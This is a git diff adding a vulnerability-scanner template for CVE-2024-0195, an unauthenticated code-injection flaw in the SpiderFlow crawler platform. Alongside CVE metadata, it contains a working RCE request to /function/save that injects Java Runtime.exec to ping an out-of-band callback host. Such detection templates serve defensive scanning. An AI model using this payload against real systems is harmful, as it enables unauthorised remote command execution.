diff --git a/http/cves/2024/CVE-2024-0195.yaml b/http/cves/2024/CVE-2024-0195.yaml new file mode 100644 index 00000000000..c458ad3cd32 --- /dev/null +++ b/http/cves/2024/CVE-2024-0195.yaml @@ -0,0 +1,56 @@ +id: CVE-2024-0195 + +info: + name: SpiderFlow Crawler Platform - Remote Code Execution + author: pussycat0x + severity: critical + description: | + A vulnerability, which was classified as critical, was found in spider-flow 0.4.3. Affected is the function FunctionService.saveFunction of the file src/main/java/org/spiderflow/controller/FunctionController.java. The manipulation leads to code injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-249510 is the identifier assigned to this vulnerability. + reference: + - https://github.com/Shelter1234/VulneraLab/blob/main/SpiderFlow/CVE-2024-0195/README.zh-cn.md + - https://vuldb.com/?id.249510 + - https://nvd.nist.gov/vuln/detail/CVE-2024-0195 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-0195 + cwe-id: CWE-94 + epss-score: 0.00107 + epss-percentile: 0.43423 + cpe: cpe:2.3:a:ssssssss:spider-flow:0.4.3:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: ssssssss + product: spider-flow + fofa-query: app="SpiderFlow" + tags: cve,cve2024,spiderflow,crawler,unauth,rce + +flow: http(1) && http(2) + +http: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'SPIDER_FLOW_VERSION' + + - raw: + - | + POST /function/save HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + X-Requested-With: XMLHttpRequest + + id=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+{{interactsh-url}}')%3B%7B + + matchers: + - type: word + part: interactsh_protocol + words: + - "dns"